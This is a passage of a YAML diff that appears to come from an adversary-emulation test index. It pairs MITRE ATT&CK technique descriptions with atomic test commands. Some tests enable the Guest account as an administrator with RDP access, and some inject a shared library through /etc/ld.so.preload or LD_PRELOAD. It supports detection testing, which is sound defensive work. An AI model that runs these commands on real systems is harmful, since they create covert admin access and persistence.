https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts + description: Microsoft. (2018, December 9). Local Accounts. Retrieved February + 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + - source_name: Metasploit SSH Module + url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh + description: Metasploit. (n.d.). Retrieved April 12, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Default Accounts + description: |- + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) + + Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) + id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T20:14:26.846Z' + created: '2020-03-13T20:15:31.974Z' + x_mitre_version: '1.2' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: Monitor whether default accounts have been activated or logged + into. These audits should also include checks on any appliances and applications + for default credentials or SSH keys, and if any are discovered, they should + be updated immediately. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + identifier: T1078.001 + atomic_tests: + - name: Enable Guest account with RDP capability and admin priviliges + auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + description: After execution the Default Guest account will be enabled (Active) + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections + supported_platforms: + - windows + input_arguments: + guest_user: + description: Specify the guest account + type: String + default: guest + guest_password: + description: Specify the guest password + type: String + default: Password123! + executor: + command: |- + net user #{guest_user} /active:yes + net user #{guest_user} #{guest_password} + net localgroup administrators #{guest_user} /add + net localgroup "Remote Desktop Users" #{guest_user} /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f + cleanup_command: |- + net user #{guest_user} /active:no >nul 2>&1 + net localgroup administrators #{guest_user} /delete >nul 2>&1 + net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1078.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.002 + url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - source_name: Microsoft AD Accounts + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts + description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved + March 13, 2020. + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1484: + technique: + id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d + description: |- + Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. + + With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). + + Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators. + name: Domain Policy Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484 + url: https://attack.mitre.org/techniques/T1484 + - source_name: ADSecurity GPO Persistence 2016 + url: https://adsecurity.org/?p=2716 + description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence + #17: Group Policy. Retrieved March 5, 2019.' + - description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and + OUs. Retrieved March 5, 2019. + url: https://wald0.com/?p=179 + source_name: Wald0 Guide to GPOs + - source_name: Harmj0y Abusing GPO Permissions + url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ + description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved + March 5, 2019. + - source_name: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Microsoft 365 Defender Solorigate + url: https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ + description: Microsoft 365 Defender Team. (2020, December 28). Using Microsoft + 365 Defender to protect against Solorigate. Retrieved January 7, 2021. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:52:24.598Z' + created: '2019-03-07T14:10:32.650Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_version: '2.0' + x_mitre_detection: |- + It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate) + x_mitre_defense_bypassed: + - System access controls + - File system access controls + x_mitre_is_subtechnique: false + atomic_tests: [] + T1484.002: + technique: + id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee + description: |- + Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. + + Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. + name: Domain Trust Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484.002 + url: https://attack.mitre.org/techniques/T1484/002 + - source_name: Microsoft - Azure AD Federation + url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed + description: Microsoft. (2018, November 28). What is federation with Azure + AD?. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-11T18:21:20.213Z' + created: '2020-12-28T21:59:02.181Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender + x_mitre_detection: |- + Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Monitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: "Federated Domain Name", or Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain) + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + atomic_tests: [] + T1574.004: + technique: + id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 + description: |- + Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. + + Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) + name: Dylib Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.004 + url: https://attack.mitre.org/techniques/T1574/004 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Wardle Dylib Hijack Vulnerable Apps + url: https://objective-see.com/blog/blog_0x46.html + description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore + Apps. Retrieved March 31, 2021. + - source_name: Wardle Dylib Hijacking OSX 2015 + url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf + description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved + March 29, 2021. + - source_name: Github EmpireProject HijackScanner + url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py + description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib + Hijack Vulnerability Scanner. Retrieved April 1, 2021. + - source_name: Github EmpireProject CreateHijacker Dylib + url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py + description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib + Hijacker. Retrieved April 1, 2021. + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. + source_name: Writing Bad Malware for OSX + - source_name: wardle artofmalware volume1 + url: https://taomm.org/vol1/pdfs.html + description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume + 0x1: Analysis. Retrieved March 19, 2021.' + - source_name: MalwareUnicorn macOS Dylib Injection MachO + url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 + description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. + Retrieved March 29, 2021. + - source_name: Apple Developer Doco Archive Run-Path + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html + description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved + March 31, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T20:19:15.212Z' + created: '2020-03-16T15:23:30.896Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: "Monitor file systems for moving, renaming, replacing, or + modifying dylibs. Changes in the set of dylibs that are loaded by a process + (compared to past behavior) that do not correlate with known software, patches, + etc., are suspicious. Check the system for multiple dylibs with the same name + and monitor which versions have historically been loaded into a process. \n\nRun + path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, + and LC_RPATH. Other special keywords are recognized by the macOS + loader are @rpath, @loader_path, and @executable_path.(Citation: + Apple Developer Doco Archive Run-Path) These loader instructions can be examined + for individual binaries or frameworks using the otool -l command. + Objective-See's Dylib Hijacking Scanner can be used to identify applications + vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: + Github EmpireProject HijackScanner)" + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + x_mitre_defense_bypassed: + - Application control + atomic_tests: [] + T1574.006: + technique: + id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + description: "Adversaries may execute their own malicious payloads by hijacking + environment variables the dynamic linker uses to load shared libraries. During + the execution preparation phase of a program, the dynamic linker loads specified + absolute paths of shared libraries from environment variables and files, such + as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES + on macOS. Libraries specified in environment variables are loaded first, taking + precedence over system libraries with the same function name.(Citation: Man + LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic + Libraries) These variables are often used by developers to debug binaries + without needing to recompile, deconflict mapped symbols, and implement custom + functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn + Linux and macOS, hijacking dynamic linker variables may grant access to the + victim process's memory, system/network resources, and possibly elevated privileges. + This method may also evade detection from security products since the execution + is masked under a legitimate process. Adversaries can set environment variables + via the command line using the export command, setenv + function, or putenv function. Adversaries can also leverage [Dynamic + Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export + variables in a shell or set variables programmatically using higher level + syntax such Python’s os.environ.\n\nOn Linux, adversaries may + set LD_PRELOAD to point to malicious libraries that match the + name of legitimate libraries which are requested by a victim program, causing + the operating system to load the adversary's malicious code upon execution + of the victim program. LD_PRELOAD can be set via the environment + variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: + TLDP Shared Libraries) Libraries specified by LD_PRELOAD are + loaded and mapped into memory by dlopen() and mmap() + respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed + Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + \n\nOn macOS this behavior is conceptually the same as on Linux, differing + only in how the macOS dynamic libraries (dyld) is implemented at a lower level. + Adversaries can set the DYLD_INSERT_LIBRARIES environment variable + to point to malicious libraries containing names of legitimate libraries or + functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: + Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina + Bypass) " + name: Dynamic Linker Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.006 + url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - source_name: Man LD.SO + url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html + description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved + June 15, 2020. + - source_name: TLDP Shared Libraries + url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html + description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved + January 31, 2020. + - source_name: Apple Doco Archive Dynamic Libraries + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html + description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved + March 24, 2021. + - source_name: Baeldung LD_PRELOAD + url: https://www.baeldung.com/linux/ld_preload-trick-what-is + description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved + March 24, 2021. + - source_name: Code Injection on Linux and macOS + url: https://www.datawire.io/code-injection-on-linux-and-macos/ + description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt + for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved + December 20, 2017.' + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - url: http://phrack.org/issues/51/8.html + description: halflife. (1997, September 1). Shared Library Redirection Techniques. + Retrieved December 20, 2017. + source_name: Phrack halfdead 1997 + - source_name: Brown Exploiting Linkers + url: http://www.nth-dimension.org.uk/pub/BTL.pdf + description: 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the + linker. Retrieved March 29, 2021.' + - source_name: TheEvilBit DYLD_INSERT_LIBRARIES + url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ + description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection + in macOS / OSX. Retrieved March 26, 2020. + - source_name: Timac DYLD_INSERT_LIBRARIES + url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ + description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. + Retrieved March 26, 2020. + - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass + url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 + description: Jon Gabilondo. (2019, September 22). How to Inject Code into + Mach-O Apps. Part II.. Retrieved March 24, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:18.453Z' + created: '2020-03-13T20:09:59.569Z' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1574.006 + atomic_tests: + - name: Shared Library Injection via /etc/ld.so.preload + auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + description: "This test adds a shared library to the `ld.so.preload` list to + execute and intercept API calls. This technique was used by threat actor Rocke + during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon + successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + \n" + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' + +' + cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload + +' + name: bash + elevation_required: true + - name: Shared Library Injection via LD_PRELOAD + auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + description: | + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. + + Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'LD_PRELOAD=#{path_to_shared_library} ls + +' + name: bash + T1055.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.001 + url: https://attack.mitre.org/techniques/T1055/001 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.endgame.com/blog/technical-blog/hunting-memory + description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December + 7, 2017. + source_name: Elastic HuntingNMemory June 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Dynamic-link Library Injection + description: "Adversaries may inject dynamic-link libraries (DLLs) into processes + in order to evade process-based defenses as well as possibly elevate privileges. + DLL injection is a method of executing arbitrary code in the address space + of a separate live process. \n\nDLL injection is commonly performed by writing + the path to a DLL in the virtual address space of the target process before + loading the DLL by invoking a new thread. The write can be performed with + native Windows API calls such as VirtualAllocEx and WriteProcessMemory, + then invoked with CreateRemoteThread (which calls the LoadLibrary + API responsible for loading the DLL). (Citation: Elastic Process Injection + July 2017) \n\nVariations of this method such as reflective DLL injection + (writing a self-mapping DLL into a process) and memory module (map DLL when + writing into process) overcome the address relocation issue as well as the + additional APIs to invoke execution (since these methods load and execute + the files in memory by manually preforming the function of LoadLibrary).(Citation: + Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July + 2017) \n\nRunning code in the context of another process may allow access + to the process's memory, system/network resources, and possibly elevated privileges. + Execution via DLL injection may also evade detection from security products + since the execution is masked under a legitimate process. " + id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.879Z' + created: '2020-01-14T01:26:08.145Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' + 